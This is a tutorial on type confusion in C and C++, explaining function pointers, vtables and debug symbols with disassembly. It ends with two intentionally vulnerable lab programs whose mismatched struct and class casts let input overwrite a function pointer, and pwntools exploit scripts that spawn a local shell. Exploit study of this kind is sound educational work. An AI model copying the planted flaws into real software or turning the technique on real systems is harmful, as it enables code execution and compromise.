What Is Type Confusion?
In high-level programming languages, a variable typically consists of three parts: data type, type name, and value. The type name serves as a marker for distinguishing variables in the programming language (for example, in C, local variable names within a function cannot be repeated within the same scope). The value is the data stored by the variable, and the data type of the variable determines how the value is interpreted.
The data type of a variable is not fixed; many programming languages allow for forced type conversion of a variable’s data type.
When a variable’s data type becomes confused, the threat can vary in severity, with the most serious being the confusion of function variables.
Function Variables
In C, functions are assigned an address, so functions can also be viewed as pointer-type variables.
data type (*function name)(parameter list)
Example:
typedef void (*test_func)(void);
What Is Polymorphism?
Structures are a more widely known concept in C, which will not be elaborated on here. As a collection of multiple variables, structures in the Linux kernel often define function variables.
Functions, in our view, generally accomplish specific behaviors, while function variables can be bound to any function. From this perspective, function variables have great freedom, allowing the Linux kernel to exhibit different behaviors through function variables.
Function variables can be seen as a way to achieve polymorphism. But what is this polymorphism?
Virtual Functions and Polymorphism
The concept of polymorphism originates from object-oriented programming, used to express different behaviors through the same interface, similar to a power socket that supplies various electrical appliances, which can be used for different purposes.
Virtual functions are the key to implementing polymorphism in C++. They can be divided into virtual functions and pure virtual functions. Virtual functions require the base class to provide an implementation, while subclasses can override the virtual function. Pure virtual functions allow the base class to not provide an implementation, but require subclasses to implement them, and a base class with pure virtual functions cannot create instance objects, existing instead as an abstract class.
Virtual Functions in C++
Compared to the implementation of polymorphism in C, virtual functions used to implement polymorphism in C++ are somewhat more complex. Below is an example for analysis.
The source code of the example program is shown below. From the source code, we can see that the program creates a base class named my_test
and defines virtual function vtest1
, pure virtual function vtest2
, and function test
. The subclass testA
overrides the virtual function vtest1
and implements the pure virtual function, while the main function main
calls them.
In addition, the class also includes constructors and destructors ~
, both of which share a characteristic: they do not carry a data type name before the function name. The constructor is called when the class is created, and the destructor is called when the class is destroyed. In the base class my_test
, we can see that the destructor ~my_test
has the virtual
identifier before it, which allows the destructor to run normally when the subclass is destroyed.
#include <iostream>
using namespace std;
class my_test {
public:
my_test() {
cout << "enter my_test" << endl;
}
virtual ~my_test() {
cout << "enter leave my_test" << endl;
}
virtual void vtest1() {
cout << "is " << __func__ << endl;
}
virtual void vtest2() = 0;
void test_func();
};
void my_test::test_func(void) {
cout << "enter " << __func__ << endl;
}
class testA: public my_test {
public:
testA() {
cout << "enter testA" << endl;
}
~testA() {
cout << "enter leave testA" << endl;
}
void vtest1 () override {
cout << "is [testA] " << __func__ << endl;
}
void vtest2(void) {
cout << "is [testA] " << __func__ <<endl;
}
};
int main(void)
{
my_test *tmp;
tmp = (my_test*)new testA();
tmp->vtest1();
tmp->vtest2();
tmp->test_func();
delete tmp;
}
The program’s output is as follows:
enter my_test
enter testA
is [testA] vtest1
is [testA] vtest2
enter test_func
leave testA
leave my_test
Exploring Strange Symbol Names
From the disassembly results, we can see many strange names. How did they become like this? Let’s start with the plt
section, which is called first!
Strange PLT Names
The contents of the plt
section are not detailed here, as its parsing process is consistent with C. Here, we focus on how libstdc++.so
knows about these peculiar names.
plt section:
<_Znwm@plt>
<_ZdlPvm@plt>
Main function main:
call 401050 <_Znwm@plt>
call 401060 <_ZdlPvm@plt>
By checking the symbol information in libstdc++.so
, we can see that these strange names are defined by this dynamic link library. By comparing the runtime address with the runtime base address to obtain the offset value, we can confirm this phenomenon.
Offset values in ELF file:
readelf -s /lib/x86_64-linux-gnu/libstdc++.so.6 | grep nwm
4817: 00000000000a9570 53 FUNC GLOBAL DEFAULT 13 _Znwm@@GLIBCXX_3.4
readelf -s /lib/x86_64-linux-gnu/libstdc++.so.6 | grep _ZdlPvm
1473: 00000000000a78e0 9 FUNC GLOBAL DEFAULT 13 _ZdlPvm@@CXXABI_1.3.9
Runtime addresses:
(gdb) info symbol 0x00007ffff7ca9570
operator new(unsigned long) in section .text of /lib/x86_64-linux-gnu/libstdc++.so.6
(gdb) info symbol 0x00007ffff7ca78e0
operator delete(void*, unsigned long) in section .text of /lib/x86_64-linux-gnu/libstdc++.so.6
Dynamic link library base address:
0x7ffff7c00000 0x7ffff7c99000 0x99000 0x0 r--p /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.30
Strange New – Up
First, we can see that before calling <_Znwm@plt>
to handle new
, 0x8
is pushed into the rdi
register as the first argument. What is this 0x8
?
mov $0x8,%edi
call 401050 <_Znwm@plt>
mov %rax,%rbx
mov %rbx,%rdi
call 4013ea <_ZN5testAC1Ev>
By tracing the program, we can see that 0x8
will be used when the new
function actually runs, which can be confirmed through GDB’s symbol resolution support or by analyzing symbol information.
GDB display:
operator new(unsigned long)
DWARF display:
<1><24b3>: Abbrev Number: 13 (DW_TAG_subprogram)
<24b4> DW_AT_name : (indirect string, offset: 0xa4a): operator new
<24bb> DW_AT_linkage_name: (indirect string, offset: 0x5f4): _Znwm
<2><24c7>: Abbrev Number: 1 (DW_TAG_formal_parameter)
<24c8> DW_AT_type : <0x537>
<2><24cc>: Abbrev Number: 0
ELF display:
6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _Znwm@GLIBCXX_3.4 (2)
The new
here receives 0x8
as a parameter to allocate an 8-byte pointer.
Introduction to Debugging Symbols
Here is a special note on debugging symbols. First, we know that binary files are quite obscure and difficult to understand. To improve the readability of binary files, computers provide debugging symbols that convert binary information into human-readable semantic information (debugging symbols can either be packaged into the binary file itself like ELF files or, like PE files, be formed into a separate file named .pdb
).
In Linux, there are ELF symbols and DWARF symbols. First, let’s look at DWARF symbols.
DWARF Symbols
In ELF files, sections named .debug_xxx
contain DWARF information. When generating assembly files .s
, we can see their presence (temporary files can be retained for viewing using GCC’s -save-temps
option). To view the DWARF information of binary format files in Linux, we can use readelf --debug-dump
to dump all DWARF information.
There are many .debug_xxx
sections in ELF, and the .debug_info
section is the one we need to focus on.
The .debug_info
section contains the core information of DWARF, storing DWARF information in a tree structure. The root node is the Compile Unit, and each .o
file corresponds to a compile unit. Nodes below the compile unit record all the necessary symbol information.
<1>
can be viewed as a top-level symbol, and the symbol levels indicated by <xx>
can traverse all subordinate symbols. Below is an example. In <1>
, it indicates DW_TAG_subprogram
, which represents that the symbol is a function. In the attribute name DW_AT_name
, we can see that the function name is shell_get
. The function node contains a sub-node named DW_TAG_formal_parameter
, which represents the parameters received by the function. From the DW_AT_name
attribute, we can see that the parameter name is msg
, and the DW_AT_type
attribute indicates the data type of the variable. By index value 0x74
, we first find that the variable is an 8-byte pointer, and then through 0x6f
, we find that the variable is modified by the const
keyword. Finally, by 0x68
, we find the data type DW_TAG_base_type
. At this point, we can deduce the complete data type signed char*
.
<0><c>: Abbrev Number: 55 (DW_TAG_compile_unit)
......
......
<1><1fa>: Abbrev Number: 23 (DW_TAG_subprogram)
<1fb> DW_AT_name : (indirect string, offset: 0): shell_get
......
<2><214>: Abbrev Number: 6 (DW_TAG_formal_parameter)
<215> DW_AT_name : msg
<219> DW_AT_decl_file : 1
<219> DW_AT_decl_line : 27
<21a> DW_AT_decl_column : 35
<21b> DW_AT_type : <0x74>
<21f> DW_AT_location : 2 byte block: 91 68 (DW_OP_fbreg: -24)
<2><222>: Abbrev Number: 0
......
<1><68>: Abbrev Number: 1 (DW_TAG_base_type)
<69> DW_AT_byte_size : 1
<6a> DW_AT_encoding : 6 (signed char)
<6b> DW_AT_name : (indirect string, offset: 0x5d): char
<1><6f>: Abbrev Number: 14 (DW_TAG_const_type)
<70> DW_AT_type : <0x68>
<1><74>: Abbrev Number: 2 (DW_TAG_pointer_type)
<75> DW_AT_byte_size : 8
<75> DW_AT_type : <0x6f>
......
ELF Symbols
ELF symbols refer to the contents of the .symtab
section, and ELF symbol information is not as comprehensive as DWARF.
If there is no debugger like GDB or if the ELF file does not contain DWARF information, and we want to analyze information such as function parameters and local variables, we can only start from the disassembly results of the function!
Strange New – Down
After calling <_Znwm@plt>
to complete the new
operation, we find that new
will allocate an available address for tmp
, and then use this address as a parameter to call <_ZN5testAC1Ev>
.
mov %rax,%rbx
movq $0x0,(%rbx)
mov %rbx,%rdi
call 4013b6 <_ZN5testAC1Ev>
Reading the disassembly code of the _ZN5testAC1Ev
function, we can see that it is the constructor of the testA
class. It first calls the constructor of the base class my_test
, then executes the logic in its own constructor.
From this, we can see that the call to the constructor is arranged during the compilation process.
_ZN5testAC1Ev
-> mov %rdi,-0x18(%rbp)
-> _ZN7my_testC1Ev
-> mov %rdi,-0x8(%rbp)
-> lea 0x2a9f(%rip),%rdx # 0x403d90
-> mov -0x8(%rbp),%rax
-> mov %rdx,(%rax)
-> lea 0x2956(%rip),%rdx # 0x403d60
-> mov -0x18(%rbp),%rax
-> mov %rdx,(%rax)
The assembly code above is particularly listed because the operations performed by these assembly codes are not the behaviors specified in the constructor.
The _ZN5testAC1Ev
function first accepts the pointer to tmp
as a parameter, then stores it at rbp-0x18
to save data, avoiding damage to rdi
during the execution of _ZN7my_testC1Ev
. After processing the parameter, we can see that there are three extremely similar assembly instructions lea ; mov ; mov
in the constructors of both my_test
and testA
, and they perform similar tasks. The first step is to use the lea
instruction to give the address of some data in the ELF file memory image to rdx
; the second step prevents the value of the tmp
address using rax
; the third step stores the memory image address from step one into tmp
.
[22] .data.rel.ro PROGBITS 0000000000403d50 00002d50
0000000000000088 0000000000000000 WA 0 0 8
By examining the address, we can see that this data corresponds to the .data.rel.ro
section. What is this data used for?
So You Are the Virtual Function Table!
Before calling the constructor of testA
, the program first hands the pointer of tmp
to rbx
and then to rdi
. This seems like a very redundant operation!
mov %rax,%rbx
mov %rbx,%rdi
call 4013ea <_ZN5testAC1Ev>
The compiler is very smart. When we continue to look down, we will find that the program will place the address of tmp
at rbp-0x18
, and then through mov (%rax),%rax
, the address stored by the constructor will be placed in rax
. Then, by offsetting by 0x10 / 0x18
, it gets address B, and finally places the address saved at address B into rdx
, and calls rdx
. The rbp-0x18
serves as an index for the data and for passing parameters.
mov %rbx,-0x18(%rbp)
vtest1:
mov -0x18(%rbp),%rax
mov (%rax),%rax
add $0x10,%rax
mov (%rax),%rdx
mov -0x18(%rbp),%rax
mov %rax,%rdi
call *%rdx
vtest2:
mov -0x18(%rbp),%rax
mov (%rax),%rax
add $0x18,%rax
mov (%rax),%rdx
mov -0x18(%rbp),%rax
mov %rax,%rdi
call *%rdx
The address of function 1 is equivalent to 0x403d60 + 0x10
, corresponding to vtest1
function implementation in the .data.rel.ro
section. The address of function 2 is equivalent to 0x403d60 + 0x18
, corresponding to vtest2
function implementation in the .data.rel.ro
section.
Contents of section .data.rel.ro:
403d50 00000000 00000000 b03d4000 00000000 .........=@.....
403d60 5e144000 00000000 b2144000 00000000 ^.@.......@.....
403d70 de144000 00000000 2e154000 00000000 ..@.......@.....
403d80 00000000 00000000 c83d4000 00000000 .........=@.....
403d90 00000000 00000000 00000000 00000000 ................
403da0 9a134000 00000000 00000000 00000000 ..@.............
403db0 00000000 00000000 67204000 00000000 ........g @.....
403dc0 c83d4000 00000000 00000000 00000000 .=@.............
403dd0 70204000 00000000 p @.....
In the disassembly code, we can find that these two addresses correspond to the implementations of vtest1
and vtest2
functions.
00000000004014de <_ZN5testA6vtest1Ev>
000000000040152e <_ZN5testA6vtest2Ev>
At this point, we understand that when creating an object based on a class, the constructor will be called, and the subclass’s constructor will call the base class’s constructor. The constructor is divided into two steps: copying the class data address and executing specified behaviors.
During the compilation phase, data will be generated based on class definitions and placed in the .data.rel.ro
section. During the runtime phase, the program will place the base address of the class data in the allocated memory, and when using virtual functions, the program will obtain the address of the virtual function from the memory image of the ELF file based on the address specified by the compiler.
From the above, we can see that the addresses of virtual functions are stored contiguously, so we can also refer to this data as the virtual function table.
Destructor Execution
Before executing the delete
operation, the program will also perform a call %rdx
operation. Here, the first check is whether the object pointer is null; if it is null, the call %rdx
operation will not be performed. Conversely, if it is not null, it will take the address from the class data offset 0x8
for the call.
mov -0x18(%rbp),%rax
test %rax,%rax
je 40124b <main+0x76>
mov (%rax),%rdx
add $0x8,%rdx
mov (%rdx),%rdx
mov %rax,%rdi
call *%rdx
In the .data.rel.ro
section, we can see that the address at offset 0x8
is 0x4014b2
.
403d60 5e144000 00000000 b2144000 00000000
The address 0x4014b2
corresponds to the function _ZN5testAD0Ev
, and this function will also call the function _ZN5testAD1Ev
. By analyzing these two functions, we can find that they are the destructors.
4014b2 <_ZN5testAD0Ev>
-> call 40145e <_ZN5testAD1Ev>
The Seriousness of Type Confusion
The difference between C and C++ in implementing virtual functions is that C defines a virtual function table itself, while C++ automatically generates one through the compiler. Regardless of how it is implemented, the freedom of function variables is quite large. If function variables are misinterpreted, it can lead to serious issues.
Example Explanation
Below, examples in both C and C++ will be provided to demonstrate the type confusion caused by virtual functions.
C Language Version
Below is the source code for the C language program.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#define MAX_DATA_LEN 0x100
static void msg_print(const char* msg);
typedef struct _your_msg {
char msg_info[MAX_DATA_LEN];
void (*msg_info_print)(const char*);
} your_msg;
typedef struct _my_msg {
void (*msg_info_print)(const char*);
char msg_info[MAX_DATA_LEN];
} my_msg;
your_msg um = {
.msg_info = "is your\n\0",
.msg_info_print = msg_print,
};
static void shell_get(const char* msg)
{
system(msg);
}
static void msg_print(const char* msg)
{
printf("%s", msg);
}
static void vuln(void* ptr)
{
my_msg *mm = (my_msg*)ptr;
mm->msg_info_print(mm->msg_info);
}
int main(void)
{
void *tmp;
tmp = &um;
um.msg_info_print = msg_print;
um.msg_info_print(um.msg_info);
printf("please input something\n");
read(STDIN_FILENO, um.msg_info, MAX_DATA_LEN);
vuln(tmp);
}
From the source code, we can see that the main
function initially uses the your_msg
structure to describe um
. The buffer variable msg_info
of um
will read content from standard input, but after passing it to the vuln
function, it will switch to using the my_msg
structure for description. Although your_msg
and my_msg
have the same members, their layout is different, causing the func
member of my_msg
to correspond to your_msg
‘s msg_info - msg_info + 0x8
, thus allowing us to control the execution logic of func
within my_msg
.
------------ ----------
| your_msg | | my_msg |
------------ ----------
| char* | | func |
------------ ----------
| func | | char* |
------------ ----------
Constructing the Exploit
Based on the analysis above, we can construct the following exploit.
import pwn
import time
import sys
pwn.context.clear()
pwn.context.update(
arch = 'amd64', os = 'linux',
)
def hack_by_c_axample():
payload = pwn.p64(target_info['elf_info'].sym['shell_get'])
payload += b'/bin/sh\0'
return payload
target_info = {
'exec_path': './type_confusion_example4c',
'elf_info': None,
'buf_len': 0x100,
'addr_len': 0x8,
'shell_get_func_addr': 0x0,
}
target_info['elf_info'] = pwn.ELF(target_info['exec_path'])
conn = pwn.process(target_info['exec_path'])
payload = hack_by_c_axample()
conn.sendafter(b'please input something\n', payload)
conn.interactive()
Successful PWN
After running the exploit, we successfully obtain a shell.
[*] '/home/astaroth/Labs/PWN/UserMode/TypeConfusion/type_confusion_example4c'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process './type_confusion_example4c': pid 42818
[*] Switching to interactive mode
$ id
uid=1000(astaroth) gid=1000(astaroth) groups=1000(astaroth)
$ exit
C++ Language Version
Below is the source code for the C++ program.
#include <iostream>
#include <cstring>
using namespace std;
#define MAX_DATA_LEN 0x100
static void vuln(void);
class offline {
public:
virtual void offline_end() = 0;
};
class offline_a: public offline {
public:
offline_a() {
strncpy(desc, "hello c++\0", MAX_DATA_LEN);
}
virtual void offline_end() {
cout << desc << endl;
}
char desc[MAX_DATA_LEN];
};
class offline_b: public offline {
public:
virtual void offline_end() {
desc();
}
void (*desc)(void);
};
static void vuln(void) {
system("/bin/sh");
}
int main(void)
{
string buf;
offline* tmpB;
offline_a* apt;
tmpB = new offline_b();
apt = static_cast<offline_a*>(tmpB);
cout << "please input something" << endl;
cin >> buf;
strncpy(apt->desc, buf.c_str(), MAX_DATA_LEN);
apt->offline_end();
}
From the above, we can see that offline_a
and offline_b
have different implementations for the virtual function offline_end
. The key is that one treats desc
as a buffer variable, while the other treats desc
as a function variable. In the main
function, offline_b
is created first and then cast to offline_a
. At this point, desc
is treated as a buffer variable, and when offline_end
is triggered, desc
becomes a function variable. Since the program allows us to write data into desc
while treating it as a buffer variable, the execution flow of offline_end
becomes controllable by us.
Constructing the Exploit
Based on the analysis above, we can construct the following exploit.
import pwn
import time
import sys
pwn.context.clear()
pwn.context.update(
arch = 'amd64', os = 'linux',
)
def hack_by_cxx_axample():
payload = pwn.p64(target_info['elf_info'].sym['_ZL4vulnv'])
return payload
target_info = {
'exec_path': './type_confusion_example4cpp',
'elf_info': None,
'buf_len': 0x100,
'addr_len': 0x8,
'shell_get_func_addr': 0x0,
}
target_info['elf_info'] = pwn.ELF(target_info['exec_path'])
conn = pwn.process(target_info['exec_path'])
payload = hack_by_cxx_axample()
conn.sendafter(b'please input something\n', payload)
conn.interactive()
Successful PWN
After running the exploit, we successfully obtain a shell.